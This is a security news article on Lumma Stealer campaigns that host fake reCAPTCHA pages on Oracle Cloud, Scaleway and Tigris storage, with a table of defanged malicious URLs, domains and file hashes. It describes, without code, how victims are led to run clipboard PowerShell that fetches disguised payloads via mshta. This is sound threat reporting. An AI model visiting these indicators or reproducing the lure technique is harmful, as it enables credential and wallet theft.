A recent wave of sophisticated cyberattacks has leveraged major cloud infrastructure platforms including Oracle Cloud Infrastructure (OCI) and Scaleway Object Storage to deliver the Lumma Stealer (LummaC2 Stealer) malware to enterprise targets.
Security researchers have linked these campaigns to Russian-speaking threat actors, highlighting a new trend in abusing trusted, mainstream cloud services to facilitate malware distribution while evading traditional defense mechanisms.
Technical Overview
The attacks, first observed in early 2025, mark a significant escalation in adversary tactics, techniques, and procedures (TTPs).
Instead of relying on conventional phishing or compromised websites, threat actors are now exploiting developer-friendly and widely trusted platforms initially Tigris Object Storage, later expanding to OCI and Scaleway to host fake reCAPTCHA verification pages.
These pages, designed to mimic legitimate human-verification processes, instruct targeted users to execute clipboard-injected PowerShell commands via the Windows “Run” dialog.
This approach specifically targets high-privilege enterprise users, increasing the risk of lateral movement and deeper organizational compromise.
Once tricked, the victim executes a seemingly innocuous PowerShell script. This script using “Living Off the Land” binaries (LOLBins) such as mshta.exe fetches a remote payload disguised as a media file (commonly with .mp4 or .ogg extensions) from attacker-controlled domains.
The actual payload is Lumma Stealer: a malware-as-a-service (MaaS) infostealer that exfiltrates credentials, system details, and cryptocurrency wallets, with advanced modularity for further attacks.
Russian-Language Attribution
According to the Report, Cato Networks analysis of compromised infrastructure and script DOM samples reveals consistent use of Russian-language comments embedded in the attack code.
These annotations, such as “Main container” and “Obfuscated code with garbage decoy functions,” appear intended to distract security analysts and obfuscate key logic, while also hinting at Russian-speaking developers and coordination.
Although not definitive evidence of direct state sponsorship, the sophistication and language use support theories of organized cybercriminal operations based in Russia.
The use of trusted cloud services like OCI and Scaleway, known for their developer flexibility and relatively low security visibility, serves two purposes: first, to bypass blacklists and automated security filters; and second, to exploit the trust that organizations place in such widely-used platforms.
By requiring manual user interaction copying and executing commands attackers also sidestep common automated detection systems.
Following public disclosure of these campaigns, Scaleway and Tigris quickly responded by removing malicious content and issuing statements on their anti-abuse efforts.
Oracle has not officially commented on the incidents as of this publication. Security vendors leveraging managed detection and response (MDR) platforms, such as the Cato MDR service, have proactively blocked redirection attempts to fake reCAPTCHA pages, employing high-confidence intrusion prevention signatures tailored to these unique TTPs.
These developments underscore an ongoing evolution in threat actor delivery tactics especially the pivot to leveraging highly trusted cloud infrastructure and targeting technically proficient, privileged enterprise users.
Security teams are urged to reinforce behavioral detection and contextual analysis capabilities, educate users about the dangers of executing clipboard-supplied code, and closely monitor for abuse of object storage platforms.
As cybercriminals continue to innovate, collaborating with cloud service providers and sharing intelligence remains vital for shrinking the attack surface and limiting the effectiveness of these covert, cloud-based malware campaigns.
Indicators of Compromise (IoCs)
| Type | Indicator/Hash | Description |
|---|---|---|
| URL | fly[.]storage[.]tigris[.]dev/jinglebellringing/hidjanam-showing-next-go[.]html | Malicious CAPTCHA page (Tigris) |
| URL | zuroxflweb[.]fly[.]storage[.]tigris[.]dev/deflowevwebv1-load-pge[.]html | Malicious CAPTCHA page (Tigris) |
| URL | objectstorage[.]ap-seoul-1[.]oraclecloud[.]com/n/id0cu93izlqm/b/need-to-complete-this/o/dest[.]html | Malicious CAPTCHA page (OCI) |
| URL | datastream-dist[.]s3[.]pl-waw[.]scw[.]cloud/pass-this-for-access-prism[.]html | Malicious CAPTCHA page (Scaleway) |
| URL | amacys[.]shop/sports[.]mp4 | Trojan masquerading as video file |
| URL | beckhamin[.]shop/deflowev1[.]mp4 | Trojan masquerading as video file |
| Domain | wq24-1[.]g-site[.]site | Redirection to malicious instructions |
| Domain | my-steamunlocked[.]online | Impersonates “Steam” platform |
| File (DLL) | MpGear.dll | fa2ebe7df2fcf7e0b9991d411792e0cb78d149833b2d06102ab34d74ffc4a682 |
| ZIP File | D0wnl0@d C0mp!3t3 L@t3st PC Setup.zip | 1544ee1ab897a791b4c2eeb9a8936e5aae331de1308b08f74aadbc24856c73a2 |
| EXE | setup.exe | 66b8074eb73353ad0a966e4a41016e0e6aa9a9fed697a0f98a1fb65db765a195 |
| Script | n.a3x | 91747f5254ccddee9de4a01f959236c1d1fda06f6ba2d2664f16dfb9e2db4175 |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
.){kind=link}